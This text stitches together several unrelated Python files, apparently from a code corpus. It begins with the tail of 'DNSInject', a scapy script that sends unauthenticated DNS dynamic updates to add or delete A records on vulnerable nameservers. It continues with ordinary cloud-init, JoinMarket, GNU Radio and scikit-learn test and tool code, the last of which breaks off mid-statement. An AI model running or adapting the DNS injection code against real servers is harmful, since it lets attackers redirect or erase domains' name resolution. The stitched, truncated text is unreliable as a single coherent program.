        sys.exit()
    print "[*] Crafting packet for record injection..."
    print "[*] Sending DNS packet adding " + new_dns_record
    print "[*] and pointing it to " + ip_value + "\n"
    # Zone is everything after the first label (a.test.com -> test.com).
    dns_zone = new_dns_record[new_dns_record.find(".")+1:]
    # Craft the packet with scapy: SOA query section names the zone,
    # authority section carries the record to add (sr1 waits for the reply).
    add_packet = sr1(IP(dst=name_server)/UDP()/DNS(
        opcode=5,
        qd=[DNSQR(qname=dns_zone, qtype="SOA")],
        ns=[DNSRR(rrname=new_dns_record,
            type="A", ttl=120, rdata=ip_value)]))
    print add_packet[DNS].summary()
    print "\n[*] Packet created and sent!"
def cli_parser():
    """Parse the command line and return the options as a 5-tuple:
    (add, delete, nameserver, domain, ip)."""
    opts = argparse.ArgumentParser(
        add_help=False,
        description="DNSInject is a tool for modifying DNS records on vulnerable servers.")
    opts.add_argument(
        "--add", action='store_true',
        help="Add \"A\" record to the vulnerable name server.")
    opts.add_argument(
        "--delete", action='store_true',
        help="Delete \"A\" record from the vulnerable name server.")
    opts.add_argument(
        "-ns", metavar="ns1.test.com",
        help="Nameserver to execute the specified action.")
    opts.add_argument(
        "-d", metavar="mynewarecord.test.com",
        help="Domain name to create an A record for.")
    opts.add_argument(
        "-ip", metavar="192.168.1.1",
        help="IP Address the new record will point to.")
    # Help flags are registered manually because add_help=False above.
    opts.add_argument(
        '-h', '-?', '--h', '-help', '--help', action="store_true",
        help=argparse.SUPPRESS)
    parsed = opts.parse_args()
    if parsed.h:
        opts.print_help()
        sys.exit()
    return parsed.add, parsed.delete, parsed.ns, parsed.d, parsed.ip
def delete_dns_record(del_ns, del_record):
    """Send a DNS dynamic update (opcode 5) that deletes a record.

    del_ns     -- address of the vulnerable DNS server
    del_record -- fully qualified record name to delete
    Exits early with an error message if either argument is missing.
    """
    os.system('clear')
    title()
    # Verifying all required options have a populated value
    if del_ns is None or del_record is None:
        print "[*] ERROR: You did not provide all the required command line options!"
        print "[*] ERROR: Please re-run with required options."
        sys.exit()
    print "[*] Crafting packet for record deletion..."
    print "[*] Sending packet which deletes the following record: "
    print "[*] " + del_record + "\n"
    # Zone is everything after the first label of the record name.
    dns_zone = del_record[del_record.find(".")+1:]
    # type=ALL / rclass=ANY with ttl 0 and empty rdata is the dynamic-update
    # encoding for "delete all RRsets at this name" (RFC 2136).
    del_packet = sr1(IP(dst=del_ns)/UDP()/DNS(
        opcode=5,
        qd=[DNSQR(qname=dns_zone, qtype="SOA")],
        ns=[DNSRR(rrname=del_record, type="ALL",
            rclass="ANY", ttl=0, rdata="")]))
    print del_packet[DNS].summary()
    print "\n[*] Packet created and sent!"
def title():
    """Print the ASCII banner shown before any other tool output."""
    print "######################################################################"
    print "#                            DNS Injector                           #"
    print "######################################################################\n"
    return
if __name__ == '__main__':
    # Parse command line arguments
    action_add, action_delete, dns_nameserver, dns_record, dns_ip = cli_parser()
    # Chose function based on action variable value
    try:
        if action_add:
            add_a_record(dns_nameserver, dns_record, dns_ip)
        elif action_delete:
            delete_dns_record(dns_nameserver, dns_record)
        else:
            print "[*] ERROR: You didn't provide a valid action."
            print "[*] ERROR: Restart and provide your desired action!"
            sys.exit()
    except AttributeError:
        # NOTE(review): presumably guards against option objects missing
        # expected attributes; re-displays the usage error either way.
        os.system('clear')
        title()
        print "[*] ERROR: You didn't provide a valid action."
        print "[*] ERROR: Restart and provide your desired action!"
# Copyright (C) 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Juerg Haefliger <juerg.haefliger@hp.com>
#
# Based on test_handler_set_hostname.py
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from cloudinit.config import cc_locale
from cloudinit import cloud
from cloudinit import distros
from cloudinit import helpers
from cloudinit import util
from cloudinit.sources import DataSourceNoCloud
from .. import helpers as t_help
from configobj import ConfigObj
from six import BytesIO
import logging
import shutil
import tempfile
LOG = logging.getLogger(__name__)
class TestLocale(t_help.FilesystemMockingTestCase):
    """Tests for the cc_locale config module (SLES locale handling)."""

    def setUp(self):
        super(TestLocale, self).setUp()
        # Work inside a throwaway root that is removed after each test.
        self.new_root = tempfile.mkdtemp()
        self.addCleanup(shutil.rmtree, self.new_root)

    def _get_cloud(self, distro):
        """Build a Cloud for *distro* backed by a NoCloud datasource."""
        self.patchUtils(self.new_root)
        path_info = helpers.Paths({})
        distro_cls = distros.fetch(distro)
        distro_obj = distro_cls(distro, {}, path_info)
        data_source = DataSourceNoCloud.DataSourceNoCloud(
            {}, distro_obj, path_info)
        return cloud.Cloud(data_source, path_info, {}, distro_obj, None)

    def test_set_locale_sles(self):
        """handle() should write RC_LANG into /etc/sysconfig/language."""
        locale_cfg = {'locale': 'My.Locale'}
        sles_cloud = self._get_cloud('sles')
        cc_locale.handle('cc_locale', locale_cfg, sles_cloud, LOG, [])
        raw = util.load_file('/etc/sysconfig/language', decode=False)
        parsed = ConfigObj(BytesIO(raw))
        self.assertEqual({'RC_LANG': locale_cfg['locale']}, dict(parsed))
| prometheanfire/cloud-init | tests/unittests/test_handler/test_handler_locale.py | Python | gpl-3.0 | 2,046 |
#! /usr/bin/env python
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from builtins import * # noqa: F401
'''Runs a full joinmarket pit (using `nirc` miniircd servers,
with `nirc` options specified as an option to pytest),in
bitcoin regtest mode with 3 maker bots and 1 taker bot,
and does 1 coinjoin. This is intended as an E2E sanity check
but certainly could be extended further.
'''
from common import make_wallets
import pytest
import sys
from jmclient import YieldGeneratorBasic, load_test_config, jm_single,\
sync_wallet, JMClientProtocolFactory, start_reactor, Taker, \
random_under_max_order_choose
from jmbase.support import get_log
from twisted.internet import reactor
from twisted.python.log import startLogging
log = get_log()
# Note that this parametrization is inherited (i.e. copied) from
# the previous 'ygrunner.py' script which is intended to be run
# manually to test out complex scenarios. Here, we only run one
# simple test with honest makers (and for simplicity malicious
# makers are not included in the code). Vars are left in in case
# we want to do more complex stuff in the automated tests later.
@pytest.mark.parametrize(
"num_ygs, wallet_structures, mean_amt, malicious, deterministic",
[
# 1sp 3yg, honest makers
(3, [[1, 3, 0, 0, 0]] * 4, 2, 0, False),
])
def test_cj(setup_full_coinjoin, num_ygs, wallet_structures, mean_amt,
            malicious, deterministic):
    """Starts by setting up wallets for maker and taker bots; then,
    instantiates a single taker with the final wallet.
    The remaining wallets are used to set up YieldGenerators (basic form).
    All the wallets are given coins according to the rules of make_wallets,
    using the parameters for the values.
    The final start_reactor call is the only one that actually starts the
    reactor; the others only set up protocol instances.
    Inline are custom callbacks for the Taker, and these are basically
    copies of those in the `sendpayment.py` script for now, but they could
    be customized later for testing.
    The Taker's schedule is a single coinjoin, using basically random values,
    again this could be easily edited or parametrized if we feel like it.
    """
    # Set up some wallets, for the ygs and 1 sp.
    wallets = make_wallets(num_ygs + 1,
                           wallet_structures=wallet_structures,
                           mean_amt=mean_amt)
    #the sendpayment bot uses the last wallet in the list
    wallet = wallets[num_ygs]['wallet']
    sync_wallet(wallet, fast=True)
    # grab a dest addr from the wallet
    destaddr = wallet.get_external_addr(4)
    coinjoin_amt = 20000000
    # Single schedule entry: spend from mixdepth 1 to destaddr with 2
    # counterparties; 0.0 wait time, not rounded.
    schedule = [[1, coinjoin_amt, 2, destaddr,
                 0.0, False]]
    """ The following two callback functions are as simple as possible
    modifications of the same in scripts/sendpayment.py
    """
    def filter_orders_callback(orders_fees, cjamount):
        # Accept any offer set unconditionally (no fee filtering in test).
        return True
    def taker_finished(res, fromtx=False, waittime=0.0, txdetails=None):
        def final_checks():
            # Re-sync and verify balances moved as the schedule dictates.
            sync_wallet(wallet, fast=True)
            newbal = wallet.get_balance_by_mixdepth()[4]
            oldbal = wallet.get_balance_by_mixdepth()[1]
            # These are our check that the coinjoin succeeded
            assert newbal == coinjoin_amt
            # TODO: parametrize these; cj fees = 38K (.001 x 20M x 2 makers)
            # minus 1K tx fee contribution each; 600M is original balance
            # in mixdepth 1
            assert oldbal + newbal + (40000 - 2000) + taker.total_txfee == 600000000
        if fromtx == "unconfirmed":
            #If final entry, stop *here*, don't wait for confirmation
            if taker.schedule_index + 1 == len(taker.schedule):
                reactor.stop()
                final_checks()
            return
        if fromtx:
            # currently this test uses a schedule with only one entry
            assert False, "taker_finished was called with fromtx=True"
            # NOTE(review): the two lines below are unreachable after the
            # failing assert above; kept as documentation of intent.
            reactor.stop()
            return
        else:
            if not res:
                assert False, "Did not complete successfully, shutting down"
            # Note that this is required in both conditional branches,
            # especially in testing, because it's possible to receive the
            # confirmed callback before the unconfirmed.
            reactor.stop()
            final_checks()
    # twisted logging is required for debugging:
    startLogging(sys.stdout)
    taker = Taker(wallet,
                  schedule,
                  order_chooser=random_under_max_order_choose,
                  max_cj_fee=(0.1, 200),
                  callbacks=(filter_orders_callback, None, taker_finished))
    clientfactory = JMClientProtocolFactory(taker)
    nodaemon = jm_single().config.getint("DAEMON", "no_daemon")
    daemon = True if nodaemon == 1 else False
    # rs=False: set up the taker's protocol but do not start the reactor yet.
    start_reactor(jm_single().config.get("DAEMON", "daemon_host"),
                  jm_single().config.getint("DAEMON", "daemon_port"),
                  clientfactory, daemon=daemon, rs=False)
    # Maker (yield generator) offer configuration shared by all ygs.
    txfee = 1000
    cjfee_a = 4200
    cjfee_r = '0.001'
    ordertype = 'swreloffer'
    minsize = 100000
    ygclass = YieldGeneratorBasic
    # As noted above, this is not currently used but can be in future:
    if malicious or deterministic:
        raise NotImplementedError
    for i in range(num_ygs):
        cfg = [txfee, cjfee_a, cjfee_r, ordertype, minsize]
        sync_wallet(wallets[i]["wallet"], fast=True)
        yg = ygclass(wallets[i]["wallet"], cfg)
        if malicious:
            yg.set_maliciousness(malicious, mtype="tx")
        clientfactory = JMClientProtocolFactory(yg, proto_type="MAKER")
        nodaemon = jm_single().config.getint("DAEMON", "no_daemon")
        daemon = True if nodaemon == 1 else False
        # As noted above, only the final start_reactor() call will
        # actually start it!
        rs = True if i == num_ygs - 1 else False
        start_reactor(jm_single().config.get("DAEMON", "daemon_host"),
                      jm_single().config.getint("DAEMON", "daemon_port"),
                      clientfactory, daemon=daemon, rs=rs)
@pytest.fixture(scope="module")
def setup_full_coinjoin():
    """Module-scoped fixture: loads the test config and switches the
    blockchain interface into simulated-block mode so transactions confirm
    without a real node."""
    load_test_config()
    # Advance the simulated chain every 10 seconds so broadcast
    # transactions get confirmations during the test.
    jm_single().bc_interface.tick_forward_chain_interval = 10
    jm_single().bc_interface.simulate_blocks()
| undeath/joinmarket-clientserver | test/test_full_coinjoin.py | Python | gpl-3.0 | 6,442 |
#
# Copyright 2013, 2018-2020 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
""" Remove blocks module """
import os
import re
import sys
import glob
import logging
from ..tools import remove_pattern_from_file, CMakeFileEditor, CPPFileEditor, get_block_names
from .base import ModTool, ModToolException
logger = logging.getLogger(__name__)
class ModToolRemove(ModTool):
    """ Remove block (delete files and remove Makefile entries) """
    name = 'remove'
    description = 'Remove a block from a module.'

    def __init__(self, blockname=None, **kwargs):
        ModTool.__init__(self, blockname, **kwargs)
        # 'pattern' may be a literal block name or a regex that matches
        # several blocks; _run_subdir() distinguishes the two cases.
        self.info['pattern'] = blockname

    def validate(self):
        """ Validates the arguments """
        ModTool._validate(self)
        if not self.info['pattern'] or self.info['pattern'].isspace():
            raise ModToolException("Incorrect blockname (Regex)!")

    def run(self):
        """ Go, go, go! """
        # This portion will be covered by the CLI
        if not self.cli:
            self.validate()
        else:
            from ..cli import cli_input
        def _remove_cc_test_case(filename=None, ed=None):
            """ Special function that removes the occurrences of a qa*.cc file
            from the CMakeLists.txt. """
            modname_ = self.info['modname']
            if filename[:2] != 'qa':
                return
            if self.info['version'] == '37':
                (base, ext) = os.path.splitext(filename)
                if ext == '.h':
                    # BUGFIX: the pattern must interpolate the deleted qa
                    # header's name; it previously contained the literal
                    # string '(unknown)' and so never matched anything.
                    remove_pattern_from_file(self._file['qalib'],
                                             fr'^#include "{filename}"\s*$')
                    remove_pattern_from_file(self._file['qalib'],
                                             fr'^\s*s->addTest\(gr::{modname_}::{base}::suite\(\)\);\s*$'
                                             )
                    self.scm.mark_file_updated(self._file['qalib'])
                elif ext == '.cc':
                    ed.remove_value('list',
                                    r'\$\{CMAKE_CURRENT_SOURCE_DIR\}/%s' % filename,
                                    to_ignore_start=f'APPEND test_{modname_}_sources')
                    self.scm.mark_file_updated(ed.filename)
            elif self.info['version'] in ['38', '310']:
                (base, ext) = os.path.splitext(filename)
                if ext == '.cc':
                    ed.remove_value(
                        'list', filename,
                        to_ignore_start=f'APPEND test_{modname_}_sources')
                    self.scm.mark_file_updated(ed.filename)
            else:
                # Pre-3.7 tree layout: each qa file is its own executable.
                filebase = os.path.splitext(filename)[0]
                ed.delete_entry('add_executable', filebase)
                ed.delete_entry('target_link_libraries', filebase)
                ed.delete_entry('GR_ADD_TEST', filebase)
                ed.remove_double_newlines()
                self.scm.mark_file_updated(ed.filename)
        def _remove_py_test_case(filename=None, ed=None):
            """ Special function that removes the occurrences of a qa*.{cc,h} file
            from the CMakeLists.txt and the qa_$modname.cc. """
            if filename[:2] != 'qa':
                return
            filebase = os.path.splitext(filename)[0]
            ed.delete_entry('GR_ADD_TEST', filebase)
            ed.remove_double_newlines()
        # Go, go, go!
        if not self.skip_subdirs['python']:
            py_files_deleted = self._run_subdir(self.info['pydir'], ('*.py',), ('GR_PYTHON_INSTALL',),
                                                cmakeedit_func=_remove_py_test_case)
            # Scrub the deleted modules from the package __init__.py.
            for f in py_files_deleted:
                remove_pattern_from_file(
                    self._file['pyinit'], fr'.*import\s+{f[:-3]}.*')
                remove_pattern_from_file(
                    self._file['pyinit'], fr'.*from\s+{f[:-3]}\s+import.*\n')
            pb_files_deleted = self._run_subdir(os.path.join(
                self.info['pydir'], 'bindings'), ('*.cc',), ('list',))
            pbdoc_files_deleted = self._run_subdir(os.path.join(
                self.info['pydir'], 'bindings', 'docstrings'), ('*.h',), ('',))
            # Update python_bindings.cc
            blocknames_to_delete = []
            if self.info['blockname']:
                # A complete block name was given
                blocknames_to_delete.append(self.info['blockname'])
            elif self.info['pattern']:
                # A regex resembling one or several blocks were given
                blocknames_to_delete = get_block_names(
                    self.info['pattern'], self.info['modname'])
            else:
                raise ModToolException("No block name or regex was specified!")
            for blockname in blocknames_to_delete:
                ed = CPPFileEditor(self._file['ccpybind'])
                ed.remove_value('// BINDING_FUNCTION_PROTOTYPES(', '// ) END BINDING_FUNCTION_PROTOTYPES',
                                'void bind_' + blockname + '(py::module& m);')
                ed.remove_value('// BINDING_FUNCTION_CALLS(', '// ) END BINDING_FUNCTION_CALLS',
                                'bind_' + blockname + '(m);')
                ed.write()
        if not self.skip_subdirs['lib']:
            self._run_subdir('lib', ('*.cc', '*.h'), ('add_library', 'list'),
                             cmakeedit_func=_remove_cc_test_case)
        if not self.skip_subdirs['include']:
            incl_files_deleted = self._run_subdir(
                self.info['includedir'], ('*.h',), ('install',))
        if not self.skip_subdirs['grc']:
            self._run_subdir('grc', ('*.yml',), ('install',))

    def _run_subdir(self, path, globs, makefile_vars, cmakeedit_func=None):
        """ Delete all files that match a certain pattern in path.
        path - The directory in which this will take place
        globs - A tuple of standard UNIX globs of files to delete (e.g. *.yml)
        makefile_vars - A tuple with a list of CMakeLists.txt-variables which
                        may contain references to the globbed files
        cmakeedit_func - If the CMakeLists.txt needs special editing, use this

        Returns the list of deleted file basenames.
        """
        if self.cli:
            from ..cli import cli_input
        # 1. Create a filtered list
        files = []
        for g in globs:
            files = files + sorted(glob.glob(f"{path}/{g}"))
        files_filt = []
        logger.info(f"Searching for matching files in {path}/:")
        if self.info['blockname']:
            # Ensure the blockname given is not confused with similarly named blocks
            blockname_pattern = ''
            if path == self.info['pydir']:
                blockname_pattern = f"^(qa_)?{self.info['blockname']}.py$"
            elif path == os.path.join(self.info['pydir'], 'bindings'):
                blockname_pattern = f"^{self.info['blockname']}_python.cc$"
            elif path == os.path.join(self.info['pydir'], 'bindings', 'docstrings'):
                blockname_pattern = f"^{self.info['blockname']}_pydoc_template.h$"
            elif path == 'lib':
                blockname_pattern = f"^{self.info['blockname']}_impl(\\.h|\\.cc)$"
            elif path == self.info['includedir']:
                blockname_pattern = f"^{self.info['blockname']}.h$"
            elif path == 'grc':
                blockname_pattern = f"^{self.info['modname']}_{self.info['blockname']}.block.yml$"
            for f in files:
                if re.search(blockname_pattern, os.path.basename(f)) is not None:
                    files_filt.append(f)
        elif self.info['pattern']:
            # A regex resembling one or several blocks were given as stdin
            for f in files:
                if re.search(self.info['pattern'], os.path.basename(f)) is not None:
                    files_filt.append(f)
        if len(files_filt) == 0:
            logger.info("None found.")
            return []
        # 2. Delete files, Makefile entries and other occurrences
        files_deleted = []
        yes = self.info['yes']
        for f in files_filt:
            b = os.path.basename(f)
            # Interactive confirmation unless --yes was given; 'a' answers
            # yes to all remaining files, 'q' aborts the whole run.
            if not yes and self.cli:
                ans = cli_input(
                    f"Really delete {f}? [Y/n/a/q]: ").lower().strip()
                if ans == 'a':
                    yes = True
                if ans == 'q':
                    sys.exit(0)
                if ans == 'n':
                    continue
            files_deleted.append(b)
            logger.info(f"Deleting {f}.")
            self.scm.remove_file(f)
            os.unlink(f)
            if (os.path.exists(f'{path}/CMakeLists.txt')):
                ed = CMakeFileEditor(f'{path}/CMakeLists.txt')
                logger.info(
                    f"Deleting occurrences of {b} from {path}/CMakeLists.txt...")
                for var in makefile_vars:
                    ed.remove_value(var, b)
                if cmakeedit_func is not None:
                    cmakeedit_func(b, ed)
                ed.write()
                # NOTE(review): a bare string (not a tuple) is passed here;
                # confirm mark_files_updated accepts a single path.
                self.scm.mark_files_updated((f'{path}/CMakeLists.txt'))
        return files_deleted
| dl1ksv/gnuradio | gr-utils/modtool/core/rm.py | Python | gpl-3.0 | 9,217 |
import numpy as np
from numpy.testing import assert_array_equal, assert_array_almost_equal
from unittest import TestCase
from sklearn.datasets.samples_generator import make_spd_matrix
from sklearn import hmm
from sklearn import mixture
from sklearn.utils.extmath import logsumexp
from sklearn.utils import check_random_state
from nose import SkipTest
# Module-wide RNG with a fixed seed so the normalize tests below are
# deterministic.
rng = np.random.RandomState(0)
# Surface floating-point warnings (over/underflow etc.) instead of ignoring.
np.seterr(all='warn')
class TestBaseHMM(TestCase):
    """Tests for the ``hmm._BaseHMM`` machinery (forward/backward passes,
    Viterbi, posteriors) via a stub subclass with injected frame
    log-likelihoods. Reference numbers come from the worked example at
    http://en.wikipedia.org/wiki/Forward-backward_algorithm
    """
    def setUp(self):
        self.prng = np.random.RandomState(9)
    class StubHMM(hmm._BaseHMM):
        # Minimal concrete subclass: the emission likelihood matrix is
        # injected directly via the ``framelogprob`` attribute, so
        # eval()/decode() can be called with an empty observation list.
        def _compute_log_likelihood(self, X):
            return self.framelogprob
        def _generate_sample_from_state(self):
            pass
        def _init(self):
            pass
    def setup_example_hmm(self):
        # Example from http://en.wikipedia.org/wiki/Forward-backward_algorithm
        h = self.StubHMM(2)
        h.transmat_ = [[0.7, 0.3], [0.3, 0.7]]
        h.startprob_ = [0.5, 0.5]
        framelogprob = np.log([[0.9, 0.2],
                               [0.9, 0.2],
                               [0.1, 0.8],
                               [0.9, 0.2],
                               [0.9, 0.2]])
        # Add dummy observations to stub.
        h.framelogprob = framelogprob
        return h, framelogprob
    def test_init(self):
        # Constructing a second HMM from the first one's parameters must
        # reproduce them exactly.
        h, framelogprob = self.setup_example_hmm()
        for params in [('transmat_',), ('startprob_', 'transmat_')]:
            d = dict((x[:-1], getattr(h, x)) for x in params)
            h2 = self.StubHMM(h.n_components, **d)
            self.assertEqual(h.n_components, h2.n_components)
            for p in params:
                assert_array_almost_equal(getattr(h, p), getattr(h2, p))
    def test_do_forward_pass(self):
        h, framelogprob = self.setup_example_hmm()
        logprob, fwdlattice = h._do_forward_pass(framelogprob)
        # Reference value from the Wikipedia example.
        reflogprob = -3.3725
        self.assertAlmostEqual(logprob, reflogprob, places=4)
        reffwdlattice = np.array([[0.4500, 0.1000],
                                  [0.3105, 0.0410],
                                  [0.0230, 0.0975],
                                  [0.0408, 0.0150],
                                  [0.0298, 0.0046]])
        assert_array_almost_equal(np.exp(fwdlattice), reffwdlattice, 4)
    def test_do_backward_pass(self):
        h, framelogprob = self.setup_example_hmm()
        bwdlattice = h._do_backward_pass(framelogprob)
        refbwdlattice = np.array([[0.0661, 0.0455],
                                  [0.0906, 0.1503],
                                  [0.4593, 0.2437],
                                  [0.6900, 0.4100],
                                  [1.0000, 1.0000]])
        assert_array_almost_equal(np.exp(bwdlattice), refbwdlattice, 4)
    def test_do_viterbi_pass(self):
        h, framelogprob = self.setup_example_hmm()
        logprob, state_sequence = h._do_viterbi_pass(framelogprob)
        refstate_sequence = [0, 0, 1, 0, 0]
        assert_array_equal(state_sequence, refstate_sequence)
        reflogprob = -4.4590
        self.assertAlmostEqual(logprob, reflogprob, places=4)
    def test_eval(self):
        h, framelogprob = self.setup_example_hmm()
        nobs = len(framelogprob)
        # eval([]) works because StubHMM ignores observations and uses the
        # injected framelogprob.
        logprob, posteriors = h.eval([])
        assert_array_almost_equal(posteriors.sum(axis=1), np.ones(nobs))
        reflogprob = -3.3725
        self.assertAlmostEqual(logprob, reflogprob, places=4)
        refposteriors = np.array([[0.8673, 0.1327],
                                  [0.8204, 0.1796],
                                  [0.3075, 0.6925],
                                  [0.8204, 0.1796],
                                  [0.8673, 0.1327]])
        assert_array_almost_equal(posteriors, refposteriors, decimal=4)
    def test_hmm_eval_consistent_with_gmm(self):
        n_components = 8
        nobs = 10
        h = self.StubHMM(n_components)
        # Add dummy observations to stub.
        framelogprob = np.log(self.prng.rand(nobs, n_components))
        h.framelogprob = framelogprob
        # If startprob and transmat are uniform across all states (the
        # default), the transitions are uninformative - the model
        # reduces to a GMM with uniform mixing weights (in terms of
        # posteriors, not likelihoods).
        logprob, hmmposteriors = h.eval([])
        assert_array_almost_equal(hmmposteriors.sum(axis=1), np.ones(nobs))
        norm = logsumexp(framelogprob, axis=1)[:, np.newaxis]
        gmmposteriors = np.exp(framelogprob - np.tile(norm, (1, n_components)))
        assert_array_almost_equal(hmmposteriors, gmmposteriors)
    def test_hmm_decode_consistent_with_gmm(self):
        n_components = 8
        nobs = 10
        h = self.StubHMM(n_components)
        # Add dummy observations to stub.
        framelogprob = np.log(self.prng.rand(nobs, n_components))
        h.framelogprob = framelogprob
        # If startprob and transmat are uniform across all states (the
        # default), the transitions are uninformative - the model
        # reduces to a GMM with uniform mixing weights (in terms of
        # posteriors, not likelihoods).
        viterbi_ll, state_sequence = h.decode([])
        norm = logsumexp(framelogprob, axis=1)[:, np.newaxis]
        gmmposteriors = np.exp(framelogprob - np.tile(norm, (1, n_components)))
        gmmstate_sequence = gmmposteriors.argmax(axis=1)
        assert_array_equal(state_sequence, gmmstate_sequence)
    def test_base_hmm_attributes(self):
        # Setters for startprob_/transmat_ must validate normalization
        # and shape, raising ValueError otherwise.
        n_components = 20
        startprob = self.prng.rand(n_components)
        startprob = startprob / startprob.sum()
        transmat = self.prng.rand(n_components, n_components)
        transmat /= np.tile(transmat.sum(axis=1)
                            [:, np.newaxis], (1, n_components))
        h = self.StubHMM(n_components)
        self.assertEquals(h.n_components, n_components)
        h.startprob_ = startprob
        assert_array_almost_equal(h.startprob_, startprob)
        self.assertRaises(ValueError, h.__setattr__, 'startprob_',
                          2 * startprob)
        self.assertRaises(ValueError, h.__setattr__, 'startprob_', [])
        self.assertRaises(ValueError, h.__setattr__, 'startprob_',
                          np.zeros((n_components - 2, 2)))
        h.transmat_ = transmat
        assert_array_almost_equal(h.transmat_, transmat)
        self.assertRaises(ValueError, h.__setattr__, 'transmat_',
                          2 * transmat)
        self.assertRaises(ValueError, h.__setattr__, 'transmat_', [])
        self.assertRaises(ValueError, h.__setattr__, 'transmat_',
                          np.zeros((n_components - 2, n_components)))
def train_hmm_and_keep_track_of_log_likelihood(hmm, obs, n_iter=1, **kwargs):
    """Run ``n_iter`` single-iteration EM fits on *hmm* and return the total
    log-likelihood of *obs* after each iteration.

    NOTE(review): the parameter name ``hmm`` shadows the ``sklearn.hmm``
    module inside this function; it is kept because callers may pass it by
    keyword. An initial fit is performed before the loop and its likelihood
    is not recorded (callers additionally slice the result with ``[1:]``).
    """
    hmm.n_iter = 1
    hmm.fit(obs)
    loglikelihoods = []
    for n in xrange(n_iter):
        hmm.n_iter = 1
        # Freeze initialization so each fit continues from current params.
        hmm.init_params = ''
        hmm.fit(obs)
        loglikelihoods.append(sum(hmm.score(x) for x in obs))
    return loglikelihoods
class GaussianHMMBaseTester(object):
    """Shared test logic for ``hmm.GaussianHMM``.

    Concrete subclasses (mixed in with ``TestCase``) set the class attribute
    ``covariance_type`` to one of 'spherical', 'diag', 'tied' or 'full'.
    """
    def setUp(self):
        self.prng = prng = np.random.RandomState(10)
        self.n_components = n_components = 3
        self.n_features = n_features = 3
        self.startprob = prng.rand(n_components)
        self.startprob = self.startprob / self.startprob.sum()
        self.transmat = prng.rand(n_components, n_components)
        self.transmat /= np.tile(self.transmat.sum(axis=1)[:, np.newaxis],
                                 (1, n_components))
        self.means = prng.randint(-20, 20, (n_components, n_features))
        # One covariance parametrization per supported covariance_type.
        self.covars = {
            'spherical': (1.0 + 2 * np.dot(prng.rand(n_components, 1),
                                           np.ones((1, n_features)))) ** 2,
            'tied': (make_spd_matrix(n_features, random_state=0)
                     + np.eye(n_features)),
            'diag': (1.0 + 2 * prng.rand(n_components, n_features)) ** 2,
            'full': np.array([make_spd_matrix(n_features, random_state=0)
                              + np.eye(n_features)
                              for x in range(n_components)]),
        }
        # The same covariances expanded to full (n_features, n_features)
        # matrices per component, for comparison with the model output.
        self.expanded_covars = {
            'spherical': [np.eye(n_features) * cov
                          for cov in self.covars['spherical']],
            'diag': [np.diag(cov) for cov in self.covars['diag']],
            'tied': [self.covars['tied']] * n_components,
            'full': self.covars['full'],
        }
    def test_bad_covariance_type(self):
        hmm.GaussianHMM(20, self.covariance_type)
        self.assertRaises(ValueError, hmm.GaussianHMM, 20,
                          'badcovariance_type')
    def _test_attributes(self):
        # XXX: This test is bugged and creates weird errors -- skipped
        # (leading underscore keeps the test runner from collecting it).
        h = hmm.GaussianHMM(self.n_components, self.covariance_type)
        self.assertEquals(h.n_components, self.n_components)
        self.assertEquals(h.covariance_type, self.covariance_type)
        h.startprob_ = self.startprob
        assert_array_almost_equal(h.startprob_, self.startprob)
        self.assertRaises(ValueError, h.__setattr__, 'startprob_',
                          2 * self.startprob)
        self.assertRaises(ValueError, h.__setattr__, 'startprob_', [])
        self.assertRaises(ValueError, h.__setattr__, 'startprob_',
                          np.zeros((self.n_components - 2, self.n_features)))
        h.transmat_ = self.transmat
        assert_array_almost_equal(h.transmat_, self.transmat)
        self.assertRaises(ValueError, h.__setattr__, 'transmat_',
                          2 * self.transmat)
        self.assertRaises(ValueError, h.__setattr__, 'transmat_', [])
        self.assertRaises(ValueError, h.__setattr__, 'transmat_',
                          np.zeros((self.n_components - 2, self.n_components)))
        h.means_ = self.means
        self.assertEquals(h.n_features, self.n_features)
        self.assertRaises(ValueError, h.__setattr__, 'means_', [])
        self.assertRaises(ValueError, h.__setattr__, 'means_',
                          np.zeros((self.n_components - 2, self.n_features)))
        h.covars_ = self.covars[self.covariance_type]
        assert_array_almost_equal(h.covars_,
                                  self.expanded_covars[self.covariance_type])
        #self.assertRaises(ValueError, h.__setattr__, 'covars', [])
        #self.assertRaises(ValueError, h.__setattr__, 'covars',
        #                  np.zeros((self.n_components - 2, self.n_features)))
    def test_eval_and_decode(self):
        h = hmm.GaussianHMM(self.n_components, self.covariance_type)
        h.means_ = self.means
        h.covars_ = self.covars[self.covariance_type]
        # Make sure the means are far apart so posteriors.argmax()
        # picks the actual component used to generate the observations.
        h.means_ = 20 * h.means_
        gaussidx = np.repeat(range(self.n_components), 5)
        nobs = len(gaussidx)
        obs = self.prng.randn(nobs, self.n_features) + h.means_[gaussidx]
        ll, posteriors = h.eval(obs)
        self.assertEqual(posteriors.shape, (nobs, self.n_components))
        assert_array_almost_equal(posteriors.sum(axis=1), np.ones(nobs))
        viterbi_ll, stateseq = h.decode(obs)
        assert_array_equal(stateseq, gaussidx)
    def test_sample(self, n=1000):
        h = hmm.GaussianHMM(self.n_components, self.covariance_type)
        # Make sure the means are far apart so posteriors.argmax()
        # picks the actual component used to generate the observations.
        h.means_ = 20 * self.means
        h.covars_ = np.maximum(self.covars[self.covariance_type], 0.1)
        h.startprob_ = self.startprob
        samples = h.sample(n)[0]
        self.assertEquals(samples.shape, (n, self.n_features))
    def test_fit(self, params='stmc', n_iter=5, verbose=False, **kwargs):
        h = hmm.GaussianHMM(self.n_components, self.covariance_type)
        h.startprob_ = self.startprob
        h.transmat_ = hmm.normalize(self.transmat
                                    + np.diag(self.prng.rand(self.n_components)), 1)
        h.means_ = 20 * self.means
        h.covars_ = self.covars[self.covariance_type]
        # Create training data by sampling from the HMM.
        train_obs = [h.sample(n=10)[0] for x in xrange(10)]
        # Mess up the parameters and see if we can re-learn them.
        h.n_iter = 0
        h.fit(train_obs)
        trainll = train_hmm_and_keep_track_of_log_likelihood(
            h, train_obs, n_iter=n_iter, params=params, **kwargs)[1:]
        # Check that the loglik is always increasing during training
        # (Python 2 print statements; this module predates Python 3.)
        if not np.all(np.diff(trainll) > 0) and verbose:
